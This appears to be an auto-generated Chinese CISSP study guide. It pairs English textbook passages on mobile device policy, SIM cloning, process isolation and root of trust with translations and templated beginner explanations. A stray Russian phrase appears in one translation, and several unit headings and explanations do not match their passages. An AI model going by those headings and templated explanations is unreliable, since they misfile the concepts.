安全产品管理 移动设备部署政策应规定是否应在移动设备上安装防病毒、防恶意软件、防 间谍软件扫描程序、防火墙、HIDS或其他安全工具。 政策应指明推荐使用 的具体产品/应用程序,以及这些解决方案的设置。 取证 移动设备部署政策应涵盖与移动设备相关的取证和调查。 用户需知晓,在发生 安全违规或犯罪活动时,其设备可能被卷入调查。 调查将要求从这些设备中收 集证据。 部分证据收集过程可能是破坏性的,某些法律调查还要求没收设备。 个人设备的所有者可能拒绝提供其设备内容的访问权限,即使从理论上讲,这 些内容属于组织所有。 公司拥有的设备可能预装了二级账户、主密码或远程管 理工具,使组织能够在未经用户同意的情况下访问设备内容。 在所有法律事务中,包括移动设备取证和隐私问题,请咨询您的律 师以确定最佳行动方案和政策内容。 隐私 移动设备部署政策应涵盖隐私和监控。 当个人设备用于业务任务时,用户通常 会失去此前使用移动设备工作时享有的部分或全部隐私。 员工可能需要同意在 移动设备上被追踪和监控,即使在非公司场所和非工作时间也是如此。 在 BYOD或CYOD模式下使用的个人设备,个人应将其视为准公司财产。

员工保护其移动设备隐私的主要方式是不要将同一台设备同时用于工作和个 人活动。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 630 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

检测是 IDS,主动阻断更像 IPS。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 88 / PDF P631

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Architecture/Infrastructure Considerations When implementing mobile device deployment policies, organizations should evaluate their network and security design, architecture, and infrastructure. If every worker brings in a personal device, the number of endpoint devices on the network may double. This requires planning to handle IP assignments, communications isolation, data-priority management, and increased intrusion detection system (IDS)/intrusion prevention system (IPS) monitoring load, as well as increased bandwidth consumption, both internally and across any Internet link.

Most mobile devices are wireless enabled, so this will likely require a more robust wireless network and dealing with Wi-Fi congestion and interference. Your mobile device deployment policy must be considered in light of the additional infrastructure costs it will trigger. Legal Concerns Company attorneys should evaluate the legal concerns of mobile devices. Using personal devices in the execution of business tasks probably means an increased burden of liability and risk of data leakage. Mobile devices may make employees happy, but they might not be a worthwhile or cost-effective endeavor for your organization if they significantly increase risk and legal liability.

Acceptable Use Policy The mobile device deployment policy should either reference the company's acceptable use policy (AUP) or include a mobile device–specific version focusing on unique issues. The use of personal mobile devices at work is accompanied by an increased risk of information disclosure, distraction, and access to inappropriate content. Workers should remain mindful that the primary goal when at work is to accomplish productivity tasks. Onboard Camera/Video The mobile device deployment policy needs to address mobile devices with onboard cameras. Some environments disallow cameras of any type. This would require that mobile devices be without a camera.

If cameras are allowed, a description of when they may and may not be used should be clearly documented and explained to workers. A mobile device can act as a storage device, provide an alternate wireless connection pathway to an outside provider or service, and may be used to collect images and videos that disclose confidential information or equipment.

中文直译 / 整理

架构/基础设施考虑 在实施移动设备部署策略时,组织应评估其网络和安全设计、架构及基础设施。 如果每位员工都自带个人设备,网络上的终端设备数量可能会翻倍。 这需要规 划以处理IP分配、通信隔离、数据优先级管理、增加的入侵检测系统(IDS)/ 入侵防御系统(IPS)监控负载,以及内部和任何互联网链路上增加的带宽消耗。 大多数移动设备都支持无线功能,因此这很可能需要更强大的无线网络,并应 对Wi‑Fi拥塞和干扰问题。 您的移动设备部署策略必须考虑其将引发的额外基础 设施成本。 法律问题 公司律师应评估移动设备的法律问题。 在执行业务任务时使用个人设备可能会 增加责任负担和数据泄露风险。 移动设备可能使员工感到高兴,但如果它们显 著增加风险和法律责任,对您的组织而言可能并非值得或成本效益高的举措。 可接受使用政策 移动设备部署政策应引用公司的可接受使用政策(AUP),或包含针对独特 问题的移动设备专用版本。 在工作中使用个人移动设备会增加信息泄露、分心 和访问不当内容的风险。 员工应始终牢记,工作时的主要目标是完成生产力任 务。 内置摄像头/视频 移动设备部署策略需要涵盖内置摄像头的移动设备。

某些环境禁止任何形式的 摄像头,这要求移动设备不得配备摄像头。 如果允许使用摄像头,应明确记录 并告知员工摄像头的使用与禁止使用场景。 移动设备可充当存储设备,提供通 往外部提供商或服务的备用无线连接路径,并可能用于采集披露机密信息或设 备的图像和视频。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

政策:政策是高层原则,说明必须遵守什么。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

ISO 偏标准和管理体系。

Policy 高层、强制、稳定;Procedure 具体步骤。

检测是 IDS,主动阻断更像 IPS。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 89 / PDF P632

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

If geofencing is available, it may be possible to use MDM/UEM to implement a location-specific hardware-deactivate profile to turn off the camera (or other components) while the device is on company premises but return the feature to operational status once the device leaves the geofenced area. Recording Microphone Most mobile devices with a speaker also have a microphone. The microphone can be used to record audio, noise, and voices nearby. Many mobile devices also support external microphones connected by a USB adapter, Bluetooth, or a 1/8″ stereo jack.

If microphone recording is deemed a security risk, this feature should be deactivated using an MDM/UEM or deny presence of mobile devices in sensitive areas or meetings. Tethering and Hotspots Tethering is the activity of sharing the cellular network data connection of a mobile device with other devices. This is also known as a hotspot. This effectively allows the mobile device to act as a portable wireless access point (WAP). The sharing of data connections can take place over Wi-Fi, Bluetooth, or USB cable. Some service providers include tethering in their service plans, whereas others charge an additional fee and some block tethering completely.

Tethering may represent a risk to the organization. It is a means for a user to grant Internet access to devices that are otherwise network-isolated, and it can be used as a means to bypass the company's filtering, blocking, and monitoring of Internet use. Thus, tethering should be blocked while a mobile device is within a company facility. Hotspot devices that operate as portable WAPs are available and can be used to create a Wi-Fi network linked to a telco's or carrier's data network. Hotspot devices should be barred from use in most organizations because they provide a direct link to the Internet without a company's security restrictions being enforced.

Contactless Payment Methods A number of mobile device–based payment systems, called contactless payment methods, do not require direct physical contact between the mobile device and the point-of-sale (PoS) device. Some are based on NFC, others on RFID, some on SMS, and still others on optical camera–based solutions, such as scanning Quick Response (QR) codes. Mobile payments are convenient for

中文直译 / 整理

如果可用地理围栏功能,可通过MDM/UEM实施基于位置的硬件停用配置文件, 在设备位于公司场所时关闭摄像头(或其他组件),而在设备离开地理围栏区 域后恢复该功能的正常运行状态。 录音麦克风 大多数带有扬声器的移动设备也配有麦克风。 麦克风可用于录制附近的音频、 噪音和人声。 许多移动设备还支持通过USB适配器、蓝牙或1/8′′立体声插孔连 接的外部麦克风。 如果录音麦克风被视为安全风险,则应通过MDM/UEM禁用 此功能,或禁止移动设备进入敏感区域或会议。 网络共享和热点 网络共享是指将移动设备的蜂窝网络数据连接与其他设备共享的活动。 这 также известно как 热点。 这使得移动设备能够充当便携式无线接入点( WAP)。 数据连接的共享可以通过Wi‑Fi、蓝牙或USB电缆实现。 一些服务提 供商在其服务计划中包含网络共享,而其他提供商则收取额外费用,有些则完 全阻止网络共享。 网络共享可能对组织构成风险。 它允许用户向原本网络隔离的设备提供互联网 访问,并可被用作绕过公司对互联网使用的过滤、阻止和监控的手段。 因此, 在移动设备位于公司设施内时,应阻止网络共享。

可用的热点设备可作为便携式WAP,用于创建连接到电信运营商数据网络的 Wi‑Fi网络。 由于热点设备提供了绕过公司安全限制的直接互联网连接,因此 大多数组织应禁止使用此类设备。 非接触式支付方式 许多基于移动设备的支付系统,称为非接触式支付方式,不需要移动设备与销 售点(PoS)设备之间的直接物理接触。 一些基于NFC,另一些基于RFID,一 些基于SMS,还有一些基于光学摄像头解决方案,例如扫描快速响应(QR)码。 移动支付对于

小白解释

场景先行:你是公司的安全负责人,正在读第 632 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
学习单元 90 / PDF P633

第三方治理:外包不外包责任

供应商也要被合同、审计、评估和持续监控管理起来。

教材原文段落

the shopper but might not always be a secure mechanism. Users should only employ mobile payment solutions that require a per-transaction confirmation or that require the device to be unlocked and an app launched to perform a transaction. Without these precautions, it may be possible to clone your device's contactless payment signals and perform transaction abuse. Your organization is unlikely to see any additional risk based on mobile payment solutions. However, use caution when implementing them on company-owned equipment or when they are linked to your company's financial accounts.

SIM Cloning Subscriber identity module (SIM) cards are used to associate a device with a subscriber's identity and service at a mobile or wireless telco. SIMs can be easily swapped between devices and cloned to abuse a victim's telco services. If a SIM card is cloned, then the cloned SIMs may be able to connect other devices to the telecommunications services and link the use back to the account of the original owner. Physical control must be maintained on mobile devices and an account or service lock established on mobile services with the telco carrier.

Essential Security Protection Mechanisms The need for security mechanisms within an OS comes down to one simple fact: Software should not be trusted. Third-party software is inherently untrustworthy, no matter who or where it comes from. This is not to say that all software is evil. Instead, this is a protection stance—because all third-party software is written by someone other than the OS creator, that software might cause problems. Thus, treating all non-OS software as potentially damaging allows the OS to prevent many disastrous occurrences through the use of software management protection mechanisms.

The OS must employ protection mechanisms to keep the computing environment stable and to keep processes isolated from one another. Without these efforts, the security of data could never be reliable or even possible. This is effectively applying the principle of zero trust (see Chapter 8). Computer system designers should adhere to a number of common protection mechanisms when designing secure systems. These principles are specific instances of the more general security rules that govern safe computing practices. Designing security into a system during the earliest

中文直译 / 整理

购物者来说很方便,但并不总是安全的机制。 用户应仅使用需要每笔交易确认, 或要求设备解锁并启动应用才能完成交易的移动支付解决方案。 如果没有这些 预防措施,可能会克隆您设备的非接触式支付信号并进行交易滥用。 您的组织不太可能因移动支付解决方案而面临额外风险。 但在公司设备 上实施这些方案,或将它们与公司的财务账户关联时,需谨慎处理。 SIM克隆 用户身份模块(SIM)卡用于将设备与移动或无线电信运营商的用户身份和服 务关联。 SIM卡可以在设备之间轻松更换并被克隆,以滥用受害者的电信服务。 如果SIM卡被克隆,那么这些克隆的SIM卡可能连接其他设备至电信服务,并 将使用行为追溯至原始所有者的账户。 必须对移动设备保持物理控制,并在电 信运营商处为移动服务设置账户或服务锁定。 关键安全保护机制 操作系统内安全机制的必要性源于一个简单的事实:不应信任软件。 第三方软 件本质上是不可信的,无论其来源是谁或何处。 这并非意味着所有软件都是恶 意的,而是一种保护立场——因为所有第三方软件均由操作系统创建者以外的 人员编写,这些软件可能引发问题。

因此,将所有非操作系统软件视为潜在有 害,有助于操作系统通过软件管理保护机制防止许多灾难性事件的发生。 操作 系统必须采用保护机制,以保持计算环境的稳定性,并使各进程相互隔离。 若 无这些措施,数据的安全性将永远无法可靠,甚至不可能实现。 这实际上应用 了零信任原则(见第8章)。 计算机系统设计人员在设计安全系统时,应遵循一系列通用的保护机制。 这些 原则是指导安全计算实践的更广泛安全规则的具体实例。 在系统开发的最早阶 段

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:供应商也要被合同、审计、评估和持续监控管理起来。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

身份:身份是主体在系统中的标识。

零信任:零信任默认不信任任何访问请求,需要持续验证和最小权限。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第三方治理:外包不外包责任”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

身份管理题要区分识别、认证、授权、审计。

永不默认信任、持续验证、最小权限、微分段是零信任关键词。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
身份 身份是主体在系统中的标识。
零信任 零信任默认不信任任何访问请求,需要持续验证和最小权限。
学习单元 91 / PDF P634

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

stages of development will help ensure that the overall security architecture has the best chance for success and reliability. Process Isolation Process isolation requires that the OS provide separate memory spaces for each process's instructions and data. It also requires that the OS enforce those boundaries, preventing one process from reading or writing data that belongs to another process. There are two major advantages to using this technique: It prevents unauthorized data access. It protects the integrity of processes.

Without such controls, a poorly designed process could go haywire and write data to memory spaces allocated to other processes, causing the entire system to become unstable rather than affecting only the execution of the errant process. In a more malicious vein, processes could attempt (and perhaps even succeed at) reading or writing to memory spaces outside their scope, intruding on or attacking other processes. Many modern OSs address the need for process isolation by implementing virtual machines on a per-user or per-process basis.

A virtual machine presents a user or process with a processing environment—including memory, address space, and other key system resources and services—that allows that user or process to behave as though they have sole, exclusive access to the entire computer. This allows each user or process to operate independently without requiring it to take cognizance of other users or processes that might be active simultaneously on the same machine. As part of the mediated access to the system that the OS provides, it maps virtual resources and access in lower-privileged layers/rings, and system calls are used to request access to the corresponding real resources.

This not only makes things easier for programmers, but also protects individual users and processes from one another. Hardware Segmentation Hardware segmentation is similar to process isolation in purpose—it prevents access to information that belongs to a different process/security level. The main difference is that hardware segmentation enforces these requirements through the use of physical hardware controls rather than the

中文直译 / 整理

融入安全性将有助于确保整体安全架构具备最佳的成功和可靠性机会。 进程隔离 进程隔离要求操作系统为每个进程的指令和数据提供独立的内存空间,并且 要求操作系统强制执行这些边界,防止一个进程读取或写入属于其他进程的 数据。 使用这种技术有两个主要优势: 它防止未经授权的数据访问。 它保护进程的完整性。 如果没有这样的控制机制,一个设计不良的进程可能会失控,将数据写入分配 给其他进程的内存空间,导致整个系统变得不稳定,而不仅仅是影响异常进程 的执行。 更恶意的是,进程可能尝试(甚至可能成功)读取或写入其范围之外 的内存空间,入侵或攻击其他进程。 许多现代操作系统通过为每个用户或每个进程实现虚拟机来满足进程隔离的需 求。 虚拟机为用户或进程提供一个处理环境——包括内存、地址空间以及其他 关键系统资源和服务——使该用户或进程能够表现得仿佛独占整个计算机。 这 使得每个用户或进程能够独立运行,而无需关注同一台机器上可能同时活动的 其他用户或进程。 作为操作系统提供的受控访问的一部分,它将虚拟资源和访 问映射到较低权限的层/环,并通过系统调用来请求访问相应的实际资源。 这 不仅使程序员的工作更简便,还保护了各个用户和进程彼此不受干扰。

硬件分段 硬件分段 在目的上类似于进程隔离——它防止访问属于其他进程/安全级别的 信息。 主要区别在于,硬件分段通过使用物理硬件控制来强制执行这些要求, 而不是通过

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 92 / PDF P635

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

logical process isolation controls imposed by an OS. Such implementations are rare, and they are generally restricted to national security implementations, where the extra cost and complexity is offset by the sensitivity of the information involved and the risks inherent in unauthorized access or disclosure. Root of Trust The root of trust (RoT) is a foundational concept in cybersecurity and cryptographic systems. It represents the starting point or anchor of a security chain, providing a secure and trustworthy foundation for various security functions.

The root of trust is critical for establishing and verifying the integrity, authenticity, and confidentiality of digital information within a system. A trust anchor is a specific entity or component within a system that is inherently trusted. It serves as a reference point for establishing trust in other entities or components within the system. The trust anchor is typically a well-protected and tamper-resistant element, and trust in the overall system is derived from the trustworthiness of the trust anchor. A hardware-based RoT refers to the implementation of the root of trust using dedicated hardware components.

This often involves the integration of secure hardware modules, such as Trusted Platform Modules (TPMs) or hardware security modules (HSMs), which are designed to provide a secure and isolated environment for cryptographic operations and key management. Hardware-based RoTs enhance security by isolating critical security functions from the general-purpose computing environment, making them more resistant to various forms of attacks. These concepts are crucial for building secure systems and ensuring the integrity and trustworthiness of digital interactions.

System Security Policy Just as security policy guides the day-to-day security operations, processes, and procedures in organizations, they have an important role to play when designing and implementing systems. This is equally true whether a system is entirely hardware-based, entirely software-based, or a combination of both. In this case, the role of a system security policy is to inform and guide the design, development, implementation, testing, and maintenance of a particular system. Thus, this kind of security policy tightly targets a single

中文直译 / 整理

操作系统所施加的逻辑进程隔离控制。 此类实现较为罕见,通常仅限于国家安 全应用,在这些应用中,额外的成本和复杂性因所涉及信息的敏感性以及未经 授权访问或泄露所固有的风险而得到弥补。 信任根 信任根(RoT)是网络安全和密码学系统中的基础概念。 它代表安全链的起点 或锚点,为各种安全功能提供安全且可信的基础。 信任根对于建立和验证系统 内数字信息的完整性、真实性和机密性至关重要。 信任锚是系统中一个固有可信的实体或组件。 它作为建立系统内其他实体或组 件可信性的参考点。 信任锚通常是一个受到良好保护且防篡改的元素,整个系 统的可信性源于信任锚的可信度。 基于硬件的信任根是指使用专用硬件组件实现信任根。 这通常涉及集成安全硬 件模块,例如可信平台模块(TPM)或硬件安全模块(HSM),这些模块旨在 为密码操作和密钥管理提供安全且隔离的环境。 基于硬件的信任根通过将关键 安全功能与通用计算环境隔离,增强了安全性,使其更能够抵御各种形式的攻 击。 这些概念对于构建安全系统并确保数字交互的完整性和可信性至关重要。 系统安全策略 正如安全策略指导组织中的日常安全操作、流程和程序一样,它们在设计和实 施系统时也发挥着重要作用。

无论系统完全是基于硬件的、完全基于软件的, 还是两者的结合,这一点都同样成立。 在这种情况下,系统安全策略的作用是 为特定系统的设计、开发、实施、测试和维护提供信息和指导。 因此,这类安 全策略紧密针对单个

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

真实性:真实性确认数据、身份或来源是真的,不是假冒的。

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

证书、签名、强认证常支持真实性。

认证成功不等于什么都能做;权限仍要单独授权。

ISO 偏标准和管理体系。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
授权 授权是认证之后决定你能访问什么、能做什么。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
学习单元 93 / PDF P636

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

implementation effort. (Although it may be adapted from other, similar efforts, it should reflect the target as accurately and completely as possible.) For system developers, a system security policy is best encountered in the form of a document that defines a set of rules, practices, and procedures that describe how the system should manage, protect, and distribute sensitive information. Security policies that prevent information flow from higher security levels to lower security levels are called multilevel security policies.

As a system is developed, the security policy should be designed, built, implemented, and tested as it relates to all applicable system components or elements, including any or all of the following: physical hardware components, firmware, software, and how the organization interacts with and uses the system. The overall point is that security must be considered for the entire life of the project. When security is applied only at the end, it typically fails. Common Security Architecture Flaws and Issues No security architecture is totally secure. Every computer system has weaknesses and vulnerabilities.

The goal of security models and architectures is to address as many known weaknesses as possible. Due to this fact, corrective actions must be taken to resolve security issues. The following sections present some common security issues that affect computer systems in relation to vulnerabilities of security architectures. You should understand each of the issues and how they can degrade the overall security of your system. Some issues and flaws overlap one another and are used in creative ways to attack systems. Although the following discussion covers the most common flaws, the list is not exhaustive. Attackers are very clever.

Many attacks and exploits are covered elsewhere that are also relevant to this chapter's content, such as denial of service (DoS) (Chapter 17), buffer overflow (Chapter 21), malware (Chapter 21), escalation of privilege (Chapter 21), and maintenance hooks/backdoors (Chapter 21). We covered numerous malicious issues earlier in this chapter, such as emanation eavesdropping, the cold boot attack against memory, phlashing, mobile-code-based client-side attacks, exploitation of local Internet caches, and VM escaping. Several additional adversarial threats are included here, such covert channels, design/coding flaws, rootkits, and incremental attacks. Covert Channels

中文直译 / 整理

实施工作。 (尽管它可能借鉴其他类似的努力,但应尽可能准确和完整地反映目 标。 ) 对于系统开发人员而言,系统安全策略最好以文档形式呈现,该文档定义了一 组规则、实践和流程,描述系统应如何管理、保护和分发敏感信息。 防止信息 从较高安全级别流向较低安全级别的安全策略称为多级安全策略。 在系统开发 过程中,安全策略应针对所有适用的系统组件或元素进行设计、构建、实施和 测试,包括但不限于以下内容:物理硬件组件、固件、软件,以及组织与系统 交互和使用的方式。 总体而言,必须在整个项目生命周期中考虑安全性。 如果 仅在最后阶段才应用安全性,通常会失败。 常见的安全架构缺陷与问题 没有任何安全架构是绝对安全的。 每个计算机系统都存在弱点和漏洞。 安全模 型和架构的目标是尽可能解决已知的弱点。 鉴于这一事实,必须采取纠正措施 来解决安全问题。 以下部分介绍了一些与安全架构漏洞相关的、影响计算机系 统的常见安全问题。 您应理解每个问题及其如何降低您系统的整体安全性。 某 些问题和缺陷相互重叠,并被以创造性的方式用于攻击系统。 尽管以下讨论涵 盖了最常见的缺陷,但该列表并非详尽无遗。 攻击者非常聪明。

许多攻击和利用方法在其他地方有所涉及,同样与本章内容相关,例如拒绝服 务(DoS)(第17章)、缓冲区溢出(第21章)、恶意软件(第21章)、权限 提升(第21章)以及后门/维持性挂钩(第21章)。 本章前面我们已讨论了多种 恶意问题,例如电磁泄漏窃听、针对内存的冷启动攻击、phlashing、基于移 动代码的客户端攻击、利用本地互联网缓存以及虚拟机逃逸。 本章还包含若干 其他对抗性威胁,例如隐蔽信道、设计/编码缺陷、根套件和渐进式攻击。 隐蔽通道

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
